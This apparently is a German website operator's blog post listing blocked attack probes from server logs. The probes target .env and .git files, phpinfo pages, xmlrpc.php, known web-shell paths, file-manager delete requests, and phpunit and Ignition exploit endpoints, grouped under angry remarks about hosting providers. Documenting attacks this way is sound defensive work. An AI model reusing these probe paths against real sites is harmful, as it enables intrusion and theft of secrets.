194.26.192.48 www.website*x.com – – [05/Aug/2025:03:04:09 +0200] „GET /wp-admin/setup-config.php HTTP/1.0“ 409 2665 „-“ „-“

AS53667 – FranTech Solutions – VON UNS AB JETZT WEGEN DER IGNORANZ ALS SEHR UNSICHERER PROVIDER EINGESTUFT!
admin@frantech.ca – ABSOLUT IGNORANT! – KEINERLEI REAKTION BZGL. UNSERER ABUSE-MAILS SEIT MONATEN!!!
45.61.188.253 website*x.com – – [06/Aug/2025:09:30:52 +0200] „POST /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
45.61.188.253 website*x.com – – [06/Aug/2025:09:32:16 +0200] „GET / HTTP/1.0“ 403 – „http://www.google.com.hk“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36“

AS211590 – Bucklog SARL – VON UNS AB JETZT WEGEN DER IGNORANZ ALS SEHR UNSICHERER PROVIDER EINGESTUFT!
bucklog@proton.me – ABSOLUT IGNORANT! – KEINERLEI REAKTION BZGL. UNSERER ABUSE-MAILS SEIT MONATEN!!!
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET / HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /app/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /src/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /backend/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /admin/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /.env.example HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:14 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:19 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:19 +0200] „GET /info.php HTTP/1.0“ 302 20 „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:24 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:24 +0200] „GET /tool/view/phpinfo.view.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:24 +0200] „GET /admin/phpinfo.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:24 +0200] „GET /test/phpinfo.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:24 +0200] „GET /debug/phpinfo.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:24 +0200] „GET /system/phpinfo.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.45 website*x.com – – [06/Aug/2025:09:04:24 +0200] „GET /config/phpinfo.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“

Hacker-Idioten August 2025 – Hier die armseeligen Hacking-Versuche vom Wochenende, 02.08.25 bis 03.08.25!

Entspechende Bemerkungen AN DIE PROVIDER sind mit aufgeführt.

Samstag 15 Abuse-Meldungen an jeweils 2 bis 3 Provider
Sonntag 10 Abuse-Meldungen an jeweils 2 bis 3 Provider

Die Meldungen gingen heute früh (04.08.24) alle raus.

Schauen wir mal, welcher PROVIDER WIRKLICH VERANTWORTUNGSBEWUSST REAGIERT!

HACKER-IDIOTEN VOM SONNTAG, 03.08.25:

MAIL NR. 1 TODAY!

AS131386 – Long Van System Solution JSC – VIETNAM IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! TO MAN HACKER-IDIOTS EVERY DAY!
runguyenhuu@lvsolution.vn – hm-changed@vnnic.vn = NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:01:58 +0200] „HEAD /Backup HTTP/1.0“ 403 – „http://website*x.de/Backup“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:08:44 +0200] „HEAD /BACKUP HTTP/1.0“ 403 – „http://website*x.de/BACKUP“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:12:46 +0200] „HEAD /SHOP HTTP/1.0“ 403 – „http://website*x.de/SHOP“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:14:35 +0200] „HEAD /Shop HTTP/1.0“ 403 – „http://website*x.de/Shop“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:22:44 +0200] „HEAD /shop HTTP/1.0“ 403 – „http://website*x.de/shop“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:23:45 +0200] „HEAD /bak HTTP/1.0“ 403 – „http://website*x.de/bak“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:29:30 +0200] „HEAD /sitio HTTP/1.0“ 403 – „http://website*x.de/sitio“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:34:59 +0200] „HEAD /bac HTTP/1.0“ 403 – „http://website*x.de/bac“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:37:37 +0200] „HEAD /sito HTTP/1.0“ 403 – „http://website*x.de/sito“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:45:38 +0200] „HEAD /site HTTP/1.0“ 403 – „http://website*x.de/site“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:47:25 +0200] „HEAD /Site HTTP/1.0“ 403 – „http://website*x.de/Site“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:52:38 +0200] „HEAD /SITE HTTP/1.0“ 403 – „http://website*x.de/SITE“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:02:58:41 +0200] „HEAD /blog HTTP/1.0“ 403 – „http://website*x.de/blog“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
43.153.87.54 www.website*x.de – – [03/Aug/2025:02:59:12 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“
45.119.85.39 www.website*x.de – – [03/Aug/2025:03:02:11 +0200] „HEAD /BLOG HTTP/1.0“ 403 – „http://website*x.de/BLOG“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
45.119.85.39 www.website*x.de – – [03/Aug/2025:03:05:45 +0200] „HEAD /Blog HTTP/1.0“ 403 – „http://website*x.de/Blog“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“

AS8560 – IONOS SE – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! TO MAN HACKER-IDIOTS EVERY DAY!
abuse@ionos.com
82.165.83.5 www.website*x.de – – [03/Aug/2025:04:25:11 +0200] „HEAD /backup.zip HTTP/1.0“ 403 – „-“ „-“
82.165.83.5 www.website*x.de – – [03/Aug/2025:04:25:11 +0200] „HEAD /Archive.zip HTTP/1.0“ 403 – „-“ „-“
82.165.83.5 www.website*x.de – – [03/Aug/2025:04:25:11 +0200] „HEAD /website*x.zip HTTP/1.0“ 403 – „-“ „-“
82.165.83.5 www.website*x.de – – [03/Aug/2025:04:25:12 +0200] „HEAD /website*x.de.zip HTTP/1.0“ 403 – „-“ „-“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net
91.134.248.249 www.website*x.de – – [03/Aug/2025:11:45:41 +0200] „HEAD /archive.zip HTTP/1.0“ 403 – „-“ „-“
91.134.248.249 www.website*x.de – – [03/Aug/2025:11:45:41 +0200] „HEAD /Backup.zip HTTP/1.0“ 403 – „-“ „-“
91.134.248.249 www.website*x.de – – [03/Aug/2025:11:45:41 +0200] „HEAD /public_html.zip HTTP/1.0“ 403 – „-“ „-“
91.134.248.249 www.website*x.de – – [03/Aug/2025:11:45:41 +0200] „HEAD /wordpress.zip HTTP/1.0“ 403 – „-“ „-“

MAIL NR. 2 TODAY!

MAIL NR. 3 TODAY!

AS18450 – WebNX, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dan@webnx.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
64.140.170.196 website*x.com – – [03/Aug/2025:08:02:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
commercial@livenexx.fr,abuse@ovh.net
137.74.223.84 website*x.com – – [03/Aug/2025:08:07:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

MAIL NR. 4 TODAY!

AS14061 – DigitalOcean, LLC – VERY GOOD PROVIDER! – ALWAYS STOPS THIS HACKER-IDIOTS VERY FAST!
abuse@digitalocean.com – ALWAYS REPLY TO OUR ABUSE-REPORTS!
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:03 +0200] „GET /wp-admin/images/blog.php HTTP/1.0“ 302 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:03 +0200] „GET /wp-admin/BDKR28_shell.php HTTP/1.0“ 302 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:03 +0200] „GET /wp-content/themes/twentytwentyfive/ HTTP/1.0“ 403 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:04 +0200] „GET /wp-admin/includes/wincust.php HTTP/1.0“ 302 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:04 +0200] „GET /wp-content/plugins/ HTTP/1.0“ 403 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:04 +0200] „GET /wp-admin/includes/webix.php HTTP/1.0“ 302 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:04 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:04 +0200] „GET /wp-includes/rk2.php HTTP/1.0“ 403 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:04 +0200] „GET /js/ HTTP/1.0“ 403 – „-“ „fasthttp“
64.23.241.215 website*x.com – – [03/Aug/2025:05:13:04 +0200] „GET /wp-admin/includes/BDKR28_shell.php HTTP/1.0“ 302 – „-“ „fasthttp“
… and so on… and so on…

AS8075 – Microsoft Corporation – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – THE ONLINE-FORMS ARE A ABSOLUTELY NOGO! – ABUSE PER EMAIL IS STANDARD!
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:23 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:24 +0200] „GET /autoload_classmap.php?p=%09%09%09%09%09%09%09%09%09%09%09%09%09%09%20/file.php?fm=true&delete=license.txt&path=/home/nevzatus/shroomsdeliverynearme.com/ HTTP/1.0“ 302 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:26 +0200] „GET /file.php?fm=true&delete=license.txt&path=/home/nevzatus/shroomsdeliverynearme.com/ HTTP/1.0“ 302 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:26 +0200] „GET /about.php?dir=/home/sarazi/public_html HTTP/1.0“ 302 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:27 +0200] „GET /cc.php%20/admin.php?fm=true&delete=license.txt&path=/www/wwwroot/www.globalcasinolist.net/ HTTP/1.0“ 403 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:27 +0200] „GET /file.php?fm=true&delete=license.txt&path=/home/nevzatus/shroomsdeliverynearme.com/ HTTP/1.0“ 302 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:28 +0200] „GET /wp-content/plugins/wp-help/index.php HTTP/1.0“ 403 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:28 +0200] „GET /wp-admin/css/colors/blue/index.php HTTP/1.0“ 302 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:28 +0200] „GET /filemanager.php HTTP/1.0“ 302 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:29 +0200] „GET /wp-info.php?p=%2Fhome%2Fkaltimti%2Finstaweb%2Fmimbar-minangnews.com%2Fnew HTTP/1.0“ 302 – „-“ „-“
+
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:51 +0200] „GET /admin.php?fm=true&delete=license.txt&path=/home/u756317209/domains/regmaeducation.com/public_html/ HTTP/1.0“ 302 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:52 +0200] „GET /wp-content/admin.php?fm=true&delete=license.txt&path=/home/gcynslpl/clinicalpsychologistpretoria.com/ HTTP/1.0“ 403 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:53 +0200] „GET /1.php?option&path=/www/wwwroot/www.mkgseattlestore.com HTTP/1.0“ 302 – „-“ „-“
172.192.59.152 website*x.com – – [03/Aug/2025:05:38:54 +0200] „GET /bless.php?fm=true&delete=.htaccess.bk&path=/home/u392878141/domains/siigmatech.com/public_html/ HTTP/1.0“ 403 – „-“ „-“
… and so on… and so on…

MAIL NR. 5 TODAY!

AS135918 – VIET DIGITAL TECHNOLOGY LIABILITY COMPANY – VIETNAM IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! TO MAN HACKER-IDIOTS EVERY DAY!
dathuynh@bitlearn.vn, hm-changed@vnnic.vn = NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
160.22.122.134 website*x.com – – [03/Aug/2025:08:13:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
AS201295 – Shabakeh Ertebatat Artak Towseeh PJSC – IRAN IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! TO MAN HACKER-IDIOTS EVERY DAY!
abuse@volcan.co.nz – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.252.31.27 website*x.com – – [03/Aug/2025:08:25:32 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
AS45899 – VNPT Corp – VIETNAM IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! TO MAN HACKER-IDIOTS EVERY DAY!
info@tgs.com.vn,hm-changed@vnnic.vn = NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.42.58.99 website*x.com – – [03/Aug/2025:08:31:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“

MAIL NR. 6 TODAY!

AS24940 – Hetzner Online GmbH – VERY GOOD PROVIDER! – ALWAYS STOPS THIS HACKER-IDIOTS VERY FAST!
abuse@hetzner.com – ALWAYS REPLY TO OUR ABUSE-REPORTS!
2a01:4f9:3051:1e6b::2 website*x.com – – [03/Aug/2025:08:37:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“

AS198605 – Gen Digital dba as Avast – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@avast.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
95.142.112.26 website*x.com – – [03/Aug/2025:08:39:46 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“
95.142.112.26 website*x.com – – [03/Aug/2025:08:39:47 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15“
95.142.112.26 website*x.com – – [03/Aug/2025:08:39:47 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“

MAIL NR. 7 TODAY!

AS15943 – wilhelm.tel GmbH – VERY IGNORANT! – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@wilhelm-tel.de – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
THIS SummalyBot-shit IS VERY UNWANTED!!!
2a04:4540:6b01:9801:9c55:ac5e:78c3:4539 www.website*x.de – – [03/Aug/2025:06:04:10 +0200] „GET /solaranlagen/balkonkraftwerk/balkonkraftwerk-600w-upgrade-800w.php HTTP/1.0“ 403 – „-“ „SummalyBot/2.7.0“
2a04:4540:6b01:9801:9c55:ac5e:78c3:4539 www.website*x.de – – [03/Aug/2025:06:04:11 +0200] „GET /balkonkraftwerke/solaranlagen/balkonkraftwerk/balkonkraftwerk-800-watt-balkonkraftwerk HTTP/1.0“ 403 – „-“ „SummalyBot/2.7.0“
2a04:4540:6b01:9801:9c55:ac5e:78c3:4539 www.website*x.de – – [03/Aug/2025:06:04:11 +0200] „GET / HTTP/1.0“ 403 – „-“ „SummalyBot/2.7.0“
2a04:4540:6b01:9801:9c55:ac5e:78c3:4539 www.website*x.de – – [03/Aug/2025:06:04:12 +0200] „GET /solaranlagen/balkonkraftwerk/balkonkraftwerk-600w/balkonkraftwerk-600w-guenstig-kaufen.php HTTP/1.0“ 403 – „-“ „SummalyBot/2.7.0“

AS198605 – Gen Digital dba as Avast – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@avast.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
95.142.112.26 website*x.de – – [03/Aug/2025:08:37:56 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:119.0) Gecko/20100101 Firefox/119.0“
95.142.112.26 website*x.de – – [03/Aug/2025:08:37:56 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
95.142.112.26 website*x.de – – [03/Aug/2025:08:37:56 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0“

MAIL NR. 8 TODAY!

AS48693 – Rices Privately owned enterprise- VERY UNSECURE AND IGNORANT!!! FOR US IS THIS A ROGUE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dem@demenin.net, abuse@ntup.net = NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
194.145.227.125 website*x.com – – [03/Aug/2025:09:03:27 +0200] „GET /components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

AS141995 – Contabo Asia Private Limited – VERY UNSECURE! – DAILY HACKER-IDIOTS – – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
217.217.252.17 website*x.com – – [03/Aug/2025:11:15:42 +0200] „GET /.env HTTP/1.0“ 302 20 „-“ „python-requests/2.27.1“
217.217.252.17 website*x.com – – [03/Aug/2025:11:15:43 +0200] „GET /.env HTTP/1.0“ 302 20 „-“ „python-requests/2.27.1“
217.217.252.17 website*x.com – – [03/Aug/2025:11:15:59 +0200] „GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0“ 302 20 „-“ „python-requests/2.27.1“
217.217.252.17 website*x.com – – [03/Aug/2025:11:36:23 +0200] „POST /_ignition/execute-solution HTTP/1.0“ 302 20 „-“ „python-requests/2.31.0“
217.217.252.17 website*x.com – – [03/Aug/2025:11:36:34 +0200] „GET /_ignition/execute-solution HTTP/1.0“ 302 20 „-“ „python-requests/2.31.0“

MAIL NR. 10 TODAY!

AS8075 – Microsoft Corporation – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – THE ONLINE-FORMS ARE A ABSOLUTELY NOGO! – ABUSE PER EMAIL IS STANDARD!
40.87.14.49 website*x.com – – [03/Aug/2025:12:03:53 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:12:20:24 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:12:29:27 +0200] „HEAD /Wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:12:38:01 +0200] „HEAD /WORDPRESS HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:12:52:09 +0200] „HEAD /WordPress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:13:03:28 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:13:24:22 +0200] „HEAD /Wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:13:36:45 +0200] „HEAD /WP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:13:49:12 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:13:59:32 +0200] „HEAD /Old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:14:06:48 +0200] „HEAD /OLD HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:14:20:33 +0200] „HEAD /oldsite HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:14:34:44 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:14:36:08 +0200] „HEAD /New HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:14:52:22 +0200] „HEAD /NEW HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
40.87.14.49 website*x.com – – [03/Aug/2025:15:05:04 +0200] „HEAD /wp-old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
… and so on… and so on!!!
+
52.169.115.143 website*x.com – – [03/Aug/2025:14:42:16 +0200] „GET /classwithtostring.php HTTP/1.0“ 302 – „-“ „-“

